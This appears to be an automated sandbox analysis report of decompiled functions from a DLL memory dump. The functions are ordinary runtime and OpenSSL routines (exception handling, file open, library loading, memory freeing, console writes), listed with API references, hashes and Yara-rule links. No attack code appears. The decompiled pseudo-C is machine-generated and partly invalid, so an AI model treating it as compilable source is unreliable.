				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr* _t76;
				intOrPtr _t77;
				intOrPtr _t79;
				signed int _t82;
				char _t84;
				intOrPtr _t87;
				intOrPtr _t96;
				intOrPtr _t99;
				intOrPtr* _t101;
				void* _t105;
				void* _t107;
				void* _t114;

				_t76 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t76 = E6E615764(__ecx,  *_t76);
				_t77 = _a8;
				_t6 = _t77 + 0x10; // 0x11
				_t99 = _t6;
				_push(_t99);
				_v20 = _t99;
				_v12 =  *(_t77 + 8) ^  *0x6e688c24;
				E6E5322B0(__edi, _t99,  *(_t77 + 8) ^  *0x6e688c24);
				E6E5333BC(_a12);
				_t52 = _a4;
				_t107 = _t105 - 0x1c + 0x10;
				_t96 =  *((intOrPtr*)(_t77 + 0xc));
				if(( *(_t52 + 4) & 0x00000066) != 0) {
					__eflags = _t96 - 0xfffffffe;
					if(_t96 != 0xfffffffe) {
						E6E533540(_t77, 0xfffffffe, _t99, 0x6e688c24);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t52;
					_v28 = _a12;
					 *((intOrPtr*)(_t77 - 4)) =  &_v32;
					if(_t96 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t82 = _v12;
							_t59 = _t96 + (_t96 + 2) * 2;
							_t79 =  *((intOrPtr*)(_t82 + _t59 * 4));
							_t60 = _t82 + _t59 * 4;
							_t83 =  *((intOrPtr*)(_t60 + 4));
							_v24 = _t60;
							if( *((intOrPtr*)(_t60 + 4)) == 0) {
								_t84 = _v5;
								goto L7;
							} else {
								_t61 = E6E5334E0(_t83, _t99);
								_t84 = 1;
								_v5 = 1;
								_t114 = _t61;
								if(_t114 < 0) {
									_v16 = 0;
									L13:
									_push(_t99);
									E6E5322B0(_t96, _t99, _v12);
									goto L14;
								} else {
									if(_t114 > 0) {
										_t62 = _a4;
										__eflags =  *_t62 - 0xe06d7363;
										if( *_t62 == 0xe06d7363) {
											__eflags =  *0x6e624334;
											if(__eflags != 0) {
												_t72 = E6E611B70(__eflags, 0x6e624334);
												_t107 = _t107 + 4;
												__eflags = _t72;
												if(_t72 != 0) {
													_t101 =  *0x6e624334; // 0x6e5307fa
													 *0x6e61623c(_a4, 1);
													 *_t101();
													_t99 = _v20;
													_t107 = _t107 + 8;
												}
												_t62 = _a4;
											}
										}
										E6E533520(_t62, _a8, _t62);
										_t64 = _a8;
										__eflags =  *((intOrPtr*)(_t64 + 0xc)) - _t96;
										if( *((intOrPtr*)(_t64 + 0xc)) != _t96) {
											E6E533540(_t64, _t96, _t99, 0x6e688c24);
											_t64 = _a8;
										}
										_push(_t99);
										 *((intOrPtr*)(_t64 + 0xc)) = _t79;
										E6E5322B0(_t96, _t99, _v12);
										_t87 =  *((intOrPtr*)(_v24 + 8));
										E6E533500();
										asm("int3");
										__eflags = E6E533557();
										if(__eflags != 0) {
											_t67 = E6E5325F3(_t87, __eflags);
											__eflags = _t67;
											if(_t67 != 0) {
												return 1;
											} else {
												E6E533593();
												goto L24;
											}
										} else {
											L24:
											__eflags = 0;
											return 0;
										}
									} else {
										goto L7;
									}
								}
							}
							goto L28;
							L7:
							_t96 = _t79;
						} while (_t79 != 0xfffffffe);
						if(_t84 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L28:
			}

0x6e5322f7
0x6e5322fb
0x6e5322fc
0x6e532302
0x6e53230e
0x6e532310
0x6e532316
0x6e532316
0x6e53231f
0x6e532321
0x6e532324
0x6e532327
0x6e53232f
0x6e532334
0x6e532337
0x6e53233a
0x6e532341
0x6e53239d
0x6e5323a0
0x6e5323af
0x00000000
0x6e5323af
0x00000000
0x6e532343
0x6e532343
0x6e532349
0x6e53234f
0x6e532355
0x6e5323c0
0x6e5323c9
0x6e532357
0x6e532357
0x6e532357
0x6e53235d
0x6e532360
0x6e532363
0x6e532366
0x6e532369
0x6e53236e
0x6e532384
0x00000000
0x6e532370
0x6e532372
0x6e532377
0x6e532379
0x6e53237c
0x6e53237e
0x6e532394
0x6e5323b4
0x6e5323b4
0x6e5323b8
0x00000000
0x6e532380
0x6e532380
0x6e5323ca
0x6e5323cd
0x6e5323d3
0x6e5323d5
0x6e5323dc
0x6e5323e3
0x6e5323e8
0x6e5323eb
0x6e5323ed
0x6e5323ef
0x6e5323fc
0x6e532402
0x6e532404
0x6e532407
0x6e532407
0x6e53240a
0x6e53240a
0x6e5323dc
0x6e532412
0x6e532417
0x6e53241a
0x6e53241d
0x6e532429
0x6e53242e
0x6e53242e
0x6e532431
0x6e532435
0x6e532438
0x6e532445
0x6e532448
0x6e53244d
0x6e532453
0x6e532455
0x6e53245a
0x6e53245f
0x6e532461
0x6e53246c
0x6e532463
0x6e532463
0x00000000
0x6e532463
0x6e532457
0x6e532457
0x6e532457
0x6e532459
0x6e532459
0x6e532382
0x00000000
0x6e532382
0x6e532380
0x6e53237e
0x00000000
0x6e532387
0x6e532387
0x6e532389
0x6e532390
0x00000000
0x6e532392
0x00000000
0x6e532390
0x6e532355
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 6E532327
___except_validate_context_record.LIBVCRUNTIME ref: 6E53232F
_ValidateLocalCookies.LIBCMT ref: 6E5323B8
__IsNonwritableInCurrentImage.LIBCMT ref: 6E5323E3
_ValidateLocalCookies.LIBCMT ref: 6E532438

Strings

csm, xrefs: 6E5323CD

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: b62fdaec5e96a223287b02dc4c4239dce4d3e75e490d31f94c3c22c9f445deed
Instruction ID: 5127bb83a51b798e17742fc49b807c4047c620143aedeb6143b3f9a53f3f04dd
Opcode Fuzzy Hash: b62fdaec5e96a223287b02dc4c4239dce4d3e75e490d31f94c3c22c9f445deed
Instruction Fuzzy Hash: BB418338A00629DFCF00CFA9C894ADEBBF5AF45318F208555E9249B391E735DA15CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6E56D510, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E6E56D510(void* __ebp, void* __eflags, intOrPtr _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t18;
				intOrPtr* _t21;
				void* _t22;
				void* _t24;
				void* _t26;
				void* _t27;
				void* _t28;
				intOrPtr _t29;
				void* _t30;

				_t31 = __ebp;
				_t1 =  &_a8; // 0x6e583ce7
				_t29 =  *_t1;
				_t28 = E6E5ACC20(_t22, _t27, _a4, _t29);
				E6E5311C0(_t29, 0x62);
				_t24 =  ==  ? 0x11 : 1;
				_t41 = _t28;
				if(_t28 != 0) {
					_t30 = E6E562140(_t24, 0x11, __ebp, 0x6e646018);
					__eflags = _t30;
					if(__eflags != 0) {
						E6E561B00(_t30, 0);
						E6E561B30(_t28, _t30, 0x6a, _t24, _t28);
						return _t30;
					} else {
						_push(_t28);
						E6E53926F(_t24, _t28, _t30, __eflags);
						__eflags = 0;
						return 0;
					}
				} else {
					E6E552F50(_t24, 0x11, __ebp, _t41, 2, 1, GetLastError(), "crypto\\bio\\bss_file.c", 0x45);
					_push(0x6e61dc34);
					_push(_t29);
					_push("\',\'");
					_push(_a4);
					_push("fopen(\'");
					_push(5);
					E6E5525B0();
					_t17 = E6E537E6F(_t41);
					_t42 =  *_t17 - 2;
					if( *_t17 == 2) {
						L4:
						_t18 = 0x80;
						_t26 = 0x4c;
					} else {
						_t21 = E6E537E6F(_t42);
						_t43 =  *_t21 - 6;
						if( *_t21 == 6) {
							goto L4;
						} else {
							_t4 = _t28 + 2; // 0x2
							_t18 = _t4;
							_t5 = _t28 + 0x4e; // 0x4e
							_t26 = _t5;
						}
					}
					E6E552F50(_t24, _t26, _t31, _t43, 0x20, 0x6d, _t18, "crypto\\bio\\bss_file.c", _t26);
					return 0;
				}
			}

0x6e56d510
0x6e56d512
0x6e56d512
0x6e56d524
0x6e56d52b
0x6e56d53a
0x6e56d53d
0x6e56d53f
0x6e56d5bf
0x6e56d5c4
0x6e56d5c6
0x6e56d5da
0x6e56d5e4
0x6e56d5f1
0x6e56d5c8
0x6e56d5c8
0x6e56d5c9
0x6e56d5d1
0x6e56d5d6
0x6e56d5d6
0x6e56d541
0x6e56d553
0x6e56d558
0x6e56d55d
0x6e56d55e
0x6e56d563
0x6e56d567
0x6e56d56c
0x6e56d56e
0x6e56d576
0x6e56d57b
0x6e56d57e
0x6e56d592
0x6e56d592
0x6e56d597
0x6e56d580
0x6e56d580
0x6e56d585
0x6e56d588
0x00000000
0x6e56d58a
0x6e56d58a
0x6e56d58a
0x6e56d58d
0x6e56d58d
0x6e56d58d
0x6e56d588
0x6e56d5a7
0x6e56d5b4
0x6e56d5b4

APIs

Part of subcall function 6E5ACC20: MultiByteToWideChar.KERNEL32(0000FDE9,00000008,6E644FCC,6E644FCE,00000000,00000000,?,<Xn,?,?,6E56D521,?), ref: 6E5ACC6B
Part of subcall function 6E5ACC20: GetLastError.KERNEL32(?,<Xn,?,?,6E56D521,?), ref: 6E5ACC7D
Part of subcall function 6E5ACC20: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6E644FCC,?,00000000,00000000,?,<Xn,?,?,6E56D521,?), ref: 6E5ACC9C
Part of subcall function 6E5ACC20: GetLastError.KERNEL32(?,<Xn,?,?,6E56D521,?), ref: 6E5ACCA8

___from_strstr_to_strchr.LIBCMT ref: 6E56D52B
GetLastError.KERNEL32(crypto\bio\bss_file.c,00000045,6E583CE7,?,6E644FCC,00000000), ref: 6E56D548

Strings

<Xn, xrefs: 6E56D512, 6E56D517, 6E56D523, 6E56D55D
fopen(', xrefs: 6E56D567
crypto\bio\bss_file.c, xrefs: 6E56D543, 6E56D59D
',', xrefs: 6E56D55E

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$ByteCharMultiWide$___from_strstr_to_strchr
String ID: ','$crypto\bio\bss_file.c$fopen('$<Xn
API String ID: 3952923578-567364951
Opcode ID: 99cc788f5206ee96b45e63eecb5e574a41562061993e376fcd1ca24a6b01e877
Instruction ID: c38e32ba434e8c985b30d567e99938da4ad70c389c84302db76ada4d913d4cda
Opcode Fuzzy Hash: 99cc788f5206ee96b45e63eecb5e574a41562061993e376fcd1ca24a6b01e877
Instruction Fuzzy Hash: 2611E476710210BAE32166E89C06FEF33ACDFD275EF10082AF705AA291FB515C1447A2

Uniqueness

Uniqueness Score: -1.00%

Function 6E5447B4, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E5447B4(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x6e68b950 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x6e6270f8 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E6E53F42A(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E6E53F42A(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x6e5447bd
0x6e544867
0x6e5447c5
0x6e5447c7
0x6e5447ce
0x6e5447d0
0x6e5447d6
0x6e5447e3
0x6e5447f8
0x6e5447fc
0x6e54484e
0x6e54484e
0x6e544853
0x6e544857
0x6e54485a
0x6e54485a
0x6e544860
0x6e544862
0x6e544877
0x6e544872
0x6e544876
0x6e544876
0x6e544864
0x6e544864
0x00000000
0x6e544864
0x6e5447fe
0x6e544807
0x6e54483e
0x6e54483e
0x6e544840
0x6e544842
0x00000000
0x00000000
0x6e54484a
0x00000000
0x6e54484a
0x6e544811
0x6e544816
0x6e54481b
0x00000000
0x00000000
0x6e544825
0x6e54482a
0x6e54482f
0x00000000
0x00000000
0x6e544834
0x6e54483a
0x00000000
0x6e54483a
0x6e5447db
0x00000000
0x00000000
0x00000000
0x6e5447e1
0x6e544870
0x00000000

Strings

ext-ms-, xrefs: 6E54481F
api-ms-, xrefs: 6E54480B

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 164203f486524360808b27085a988a2895d066fec9b7a31c2d9c20f4a49b5a64
Instruction ID: 2b3a90e7f2bea87595b4a4b289143109d91eb59813ff5c1610fa7fc95f2d8cc2
Opcode Fuzzy Hash: 164203f486524360808b27085a988a2895d066fec9b7a31c2d9c20f4a49b5a64
Instruction Fuzzy Hash: 66210831AC4675FFDB518EAA8D41A6E37E89F43760F210621EC15A7280E731ED02C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 6E54DD82, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E54DD82(intOrPtr _a4) {
				void* _t18;
				intOrPtr _t45;

				_t45 = _a4;
				if(_t45 != 0) {
					E6E54DACE(_t45, 7);
					_t2 = _t45 + 0x1c; // 0x6e4f6eeb
					E6E54DACE(_t2, 7);
					_t3 = _t45 + 0x38; // 0x6e4f6f07
					E6E54DACE(_t3, 0xc);
					_t4 = _t45 + 0x68; // 0x6e4f6f37
					E6E54DACE(_t4, 0xc);
					_t5 = _t45 + 0x98; // 0x6e4f6f67
					E6E54DACE(_t5, 2);
					_t6 = _t45 + 0xa0; // 0xffffffff
					E6E541B83( *_t6);
					_t7 = _t45 + 0xa4; // 0x85c7ffff
					E6E541B83( *_t7);
					_t8 = _t45 + 0xa8; // 0xfffff778
					E6E541B83( *_t8);
					_t9 = _t45 + 0xb4; // 0x6e4f6f83
					E6E54DACE(_t9, 7);
					_t10 = _t45 + 0xd0; // 0x6e4f6f9f
					E6E54DACE(_t10, 7);
					_t11 = _t45 + 0xec; // 0x6e4f6fbb
					E6E54DACE(_t11, 0xc);
					_t12 = _t45 + 0x11c; // 0x6e4f6feb
					E6E54DACE(_t12, 0xc);
					_t13 = _t45 + 0x14c; // 0x6e4f701b
					E6E54DACE(_t13, 2);
					_t14 = _t45 + 0x154; // 0x8985
					E6E541B83( *_t14);
					_t15 = _t45 + 0x158; // 0x89ce2b00
					E6E541B83( *_t15);
					_t16 = _t45 + 0x15c; // 0xfff7808d
					E6E541B83( *_t16);
					_t17 = _t45 + 0x160; // 0x89d71bff
					return E6E541B83( *_t17);
				}
				return _t18;
			}

0x6e54dd88
0x6e54dd8d
0x6e54dd96
0x6e54dd9b
0x6e54dda1
0x6e54dda6
0x6e54ddac
0x6e54ddb1
0x6e54ddb7
0x6e54ddbc
0x6e54ddc5
0x6e54ddca
0x6e54ddd0
0x6e54ddd5
0x6e54dddb
0x6e54dde0
0x6e54dde6
0x6e54ddeb
0x6e54ddf4
0x6e54ddf9
0x6e54de02
0x6e54de0a
0x6e54de13
0x6e54de18
0x6e54de21
0x6e54de26
0x6e54de2f
0x6e54de34
0x6e54de3a
0x6e54de3f
0x6e54de45
0x6e54de4a
0x6e54de50
0x6e54de55
0x00000000
0x6e54de60
0x6e54de65

APIs

Part of subcall function 6E54DACE: _free.LIBCMT ref: 6E54DAF3

_free.LIBCMT ref: 6E54DDD0

Part of subcall function 6E541B83: HeapFree.KERNEL32(00000000,00000000,?,6E54DAF8,6E4F6ECF,00000000,6E4F6ECF,?,?,6E54DD9B,6E4F6ECF,00000007,6E4F6ECF,?,6E54B969,6E4F6ECF), ref: 6E541B99
Part of subcall function 6E541B83: GetLastError.KERNEL32(6E4F6ECF,?,6E54DAF8,6E4F6ECF,00000000,6E4F6ECF,?,?,6E54DD9B,6E4F6ECF,00000007,6E4F6ECF,?,6E54B969,6E4F6ECF,6E4F6ECF), ref: 6E541BAB

_free.LIBCMT ref: 6E54DDDB
_free.LIBCMT ref: 6E54DDE6
_free.LIBCMT ref: 6E54DE3A
_free.LIBCMT ref: 6E54DE45
_free.LIBCMT ref: 6E54DE50
_free.LIBCMT ref: 6E54DE5B

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c0666a0eab9796d936513cd40f38a806bde0e7fa66b0c1b07b2120f9e0c08241
Instruction ID: fc5d195ec36be1f57339459fb2d78423a5a4439ad1a16ea4e90b00ae81a5eee7
Opcode Fuzzy Hash: c0666a0eab9796d936513cd40f38a806bde0e7fa66b0c1b07b2120f9e0c08241
Instruction Fuzzy Hash: BB110D71544B08EAD620ABF1CD45FCB77EC5F84B24F484C15B39966060DF79AA148B50

Uniqueness

Uniqueness Score: -1.00%

Function 6E5452D5, Relevance: 9.3, APIs: 6, Instructions: 317
fileCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E6E5452D5(void* __ebx, void* __edi, void* __eflags, void* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				long _v40;
				signed int _v44;
				intOrPtr _v48;
				char _v51;
				void _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				long _v92;
				intOrPtr _v96;
				long _v100;
				signed char* _v104;
				signed char* _v108;
				void* _v112;
				intOrPtr _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __esi;
				signed int _t170;
				signed int _t172;
				intOrPtr _t174;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				signed char* _t202;
				void* _t206;
				struct _OVERLAPPED* _t211;
				void* _t220;
				long _t224;
				intOrPtr _t225;
				char _t227;
				void* _t237;
				struct _OVERLAPPED* _t242;
				signed int _t245;
				intOrPtr _t248;
				signed int _t251;
				signed int _t252;
				signed int _t254;
				intOrPtr _t256;
				void* _t262;
				intOrPtr _t263;
				signed int _t264;
				signed int _t267;
				signed char _t268;
				intOrPtr _t271;
				signed int _t273;
				long _t274;
				signed int _t275;
				signed char* _t278;
				signed int _t282;
				signed int _t284;
				void* _t286;
				signed int _t289;
				signed int _t290;
				intOrPtr _t291;
				signed int _t292;
				struct _OVERLAPPED* _t294;
				struct _OVERLAPPED* _t296;
				signed int _t298;
				signed int _t300;
				void* _t301;
				void* _t303;

				_t298 = _t300;
				_t301 = _t300 - 0x8c;
				_t170 =  *0x6e688c24; // 0x8e9367b0
				_v8 = _t170 ^ _t298;
				_t172 = _a8;
				_t267 = _t172 >> 6;
				_t245 = (_t172 & 0x0000003f) * 0x38;
				_t174 =  *((intOrPtr*)(0x6e68b718 + _t267 * 4));
				_t278 = _a12;
				_v108 = _t278;
				_v80 = _t267;
				_t9 = _t174 + 0x18; // 0x8458b01
				_v112 =  *((intOrPtr*)(_t245 + _t9));
				_v44 = _t245;
				_v96 = _a16 + _t278;
				_t178 = GetConsoleOutputCP();
				_t242 = 0;
				_v124 = _t178;
				E6E53541F( &_v72, _t267, 0);
				_t284 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_t248 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t248;
				_v104 = _t278;
				if(_t278 >= _v96) {
					L49:
					__eflags = _v60 - _t242;
				} else {
					while(1) {
						_t251 = _v44;
						_v51 =  *_t278;
						_v76 = _t242;
						_v40 = 1;
						_t186 =  *((intOrPtr*)(0x6e68b718 + _v80 * 4));
						_v48 = _t186;
						if(_t248 != 0xfde9) {
							goto L20;
						}
						_t211 = _t242;
						_t271 = _v48 + 0x2e + _t251;
						_v116 = _t271;
						while( *((intOrPtr*)(_t271 + _t211)) != _t242) {
							_t211 =  &(_t211->Internal);
							if(_t211 < 5) {
								continue;
							}
							break;
						}
						_t273 = _v96 - _t278;
						_v40 = _t211;
						if(_t211 <= 0) {
							_t72 = ( *_t278 & 0x000000ff) + 0x6e688da0; // 0x0
							_t256 =  *_t72 + 1;
							_v48 = _t256;
							__eflags = _t256 - _t273;
							if(_t256 > _t273) {
								__eflags = _t273;
								if(_t273 <= 0) {
									goto L41;
								} else {
									_t290 = _v44;
									do {
										 *((char*)( *((intOrPtr*)(0x6e68b718 + _v80 * 4)) + _t290 + _t242 + 0x2e)) =  *((intOrPtr*)(_t242 + _t278));
										_t242 =  &(_t242->Internal);
										__eflags = _t242 - _t273;
									} while (_t242 < _t273);
									goto L40;
								}
							} else {
								_v144 = _t242;
								__eflags = _t256 - 4;
								_v140 = _t242;
								_v56 = _t278;
								_v40 = (_t256 == 4) + 1;
								_t220 = E6E54BB76( &_v144,  &_v76,  &_v56, (_t256 == 4) + 1,  &_v144);
								_t303 = _t301 + 0x10;
								__eflags = _t220 - 0xffffffff;
								if(_t220 == 0xffffffff) {
									goto L49;
								} else {
									_t291 = _v48;
									goto L19;
								}
							}
						} else {
							_t224 =  *((char*)(( *(_t251 + _v48 + 0x2e) & 0x000000ff) + 0x6e688da0)) + 1;
							_v56 = _t224;
							_t225 = _t224 - _v40;
							_v48 = _t225;
							if(_t225 > _t273) {
								__eflags = _t273;
								if(_t273 > 0) {
									_t292 = _t251;
									do {
										_t227 =  *((intOrPtr*)(_t242 + _t278));
										_t262 =  *((intOrPtr*)(0x6e68b718 + _v80 * 4)) + _t292 + _t242;
										_t242 =  &(_t242->Internal);
										 *((char*)(_t262 + _v40 + 0x2e)) = _t227;
										_t292 = _v44;
										__eflags = _t242 - _t273;
									} while (_t242 < _t273);
									L40:
									_t284 = _v88;
								}
								L41:
								_t289 = _t284 + _t273;
								__eflags = _t289;
								L42:
								__eflags = _v60;
								_v88 = _t289;
							} else {
								_t274 = _v40;
								_t294 = _t242;
								_t263 = _v116;
								do {
									 *((char*)(_t298 + _t294 - 0xc)) =  *((intOrPtr*)(_t263 + _t294));
									_t294 =  &(_t294->Internal);
								} while (_t294 < _t274);
								_t295 = _v48;
								_t264 = _v44;
								if(_v48 > 0) {
									E6E530AC0( &_v16 + _t274, _t278, _t295);
									_t264 = _v44;
									_t301 = _t301 + 0xc;
									_t274 = _v40;
								}
								_t282 = _v80;
								_t296 = _t242;
								do {
									 *( *((intOrPtr*)(0x6e68b718 + _t282 * 4)) + _t264 + _t296 + 0x2e) = _t242;
									_t296 =  &(_t296->Internal);
								} while (_t296 < _t274);
								_t278 = _v104;
								_t291 = _v48;
								_v120 =  &_v16;
								_v136 = _t242;
								_v132 = _t242;
								_v40 = (_v56 == 4) + 1;
								_t237 = E6E54BB76( &_v136,  &_v76,  &_v120, (_v56 == 4) + 1,  &_v136);
								_t303 = _t301 + 0x10;
								if(_t237 == 0xffffffff) {
									goto L49;
								} else {
									L19:
									_t278 = _t278 - 1 + _t291;
									L28:
									_t278 =  &(_t278[1]);
									_v104 = _t278;
									_t193 = E6E54809B(_v124, _t242,  &_v76, _v40,  &_v32, 5, _t242, _t242);
									_t301 = _t303 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L49;
									} else {
										if(WriteFile(_v112,  &_v32, _t193,  &_v100, _t242) == 0) {
											L48:
											_v92 = GetLastError();
											goto L49;
										} else {
											_t284 = _v84 - _v108 + _t278;
											_v88 = _t284;
											if(_v100 < _v56) {
												goto L49;
											} else {
												if(_v51 != 0xa) {
													L35:
													if(_t278 >= _v96) {
														goto L49;
													} else {
														_t248 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v52 = _t198;
													if(WriteFile(_v112,  &_v52, 1,  &_v100, _t242) == 0) {
														goto L48;
													} else {
														if(_v100 < 1) {
															goto L49;
														} else {
															_v84 = _v84 + 1;
															_t284 = _t284 + 1;
															_v88 = _t284;
															goto L35;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L50;
						L20:
						_t268 =  *((intOrPtr*)(_t251 + _t186 + 0x2d));
						__eflags = _t268 & 0x00000004;
						if((_t268 & 0x00000004) == 0) {
							_v33 =  *_t278;
							_t188 = E6E53A23E(_t268);
							_t252 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t252 * 2)) - _t242;
							if( *((intOrPtr*)(_t188 + _t252 * 2)) >= _t242) {
								_push(1);
								_push(_t278);
								goto L27;
							} else {
								_t100 =  &(_t278[1]); // 0x1
								_t202 = _t100;
								_v56 = _t202;
								__eflags = _t202 - _v96;
								if(_t202 >= _v96) {
									_t275 = _v80;
									_t254 = _v44;
									 *((char*)(_t254 +  *((intOrPtr*)(0x6e68b718 + _t275 * 4)) + 0x2e)) = _v33;
									 *(_t254 +  *((intOrPtr*)(0x6e68b718 + _t275 * 4)) + 0x2d) =  *(_t254 +  *((intOrPtr*)(0x6e68b718 + _t275 * 4)) + 0x2d) | 0x00000004;
									_t289 = _t284 + 1;
									goto L42;
								} else {
									_t206 = E6E541DF5( &_v76, _t278, 2);
									_t303 = _t301 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L49;
									} else {
										_t278 = _v56;
										goto L28;
									}
								}
							}
						} else {
							_v24 =  *((intOrPtr*)(_t251 + _t186 + 0x2e));
							_v23 =  *_t278;
							_push(2);
							 *(_t251 + _v48 + 0x2d) = _t268 & 0x000000fb;
							_push( &_v24);
							L27:
							_push( &_v76);
							_t190 = E6E541DF5();
							_t303 = _t301 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L49;
							} else {
								goto L28;
							}
						}
						goto L50;
					}
				}
				L50:
				if(__eflags != 0) {
					_t183 = _v72;
					_t165 = _t183 + 0x350;
					 *_t165 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t165;
				}
				__eflags = _v8 ^ _t298;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_pop(_t286);
				return E6E52F227(_v8 ^ _t298, _t286);
			}

0x6e5452d8
0x6e5452da
0x6e5452e0
0x6e5452e7
0x6e5452ea
0x6e5452f2
0x6e5452f5
0x6e5452fa
0x6e545302
0x6e545305
0x6e545308
0x6e54530b
0x6e54530f
0x6e545317
0x6e54531a
0x6e54531d
0x6e545323
0x6e545325
0x6e54532c
0x6e545336
0x6e545338
0x6e54533b
0x6e54533e
0x6e545341
0x6e545344
0x6e545347
0x6e54534d
0x6e545658
0x6e545658
0x00000000
0x6e545353
0x6e54535b
0x6e54535e
0x6e545364
0x6e545367
0x6e54536e
0x6e545375
0x6e545378
0x00000000
0x00000000
0x6e545381
0x6e545386
0x6e545388
0x6e54538b
0x6e545390
0x6e545394
0x00000000
0x00000000
0x00000000
0x6e545394
0x6e545399
0x6e54539b
0x6e5453a0
0x6e54545a
0x6e545461
0x6e545462
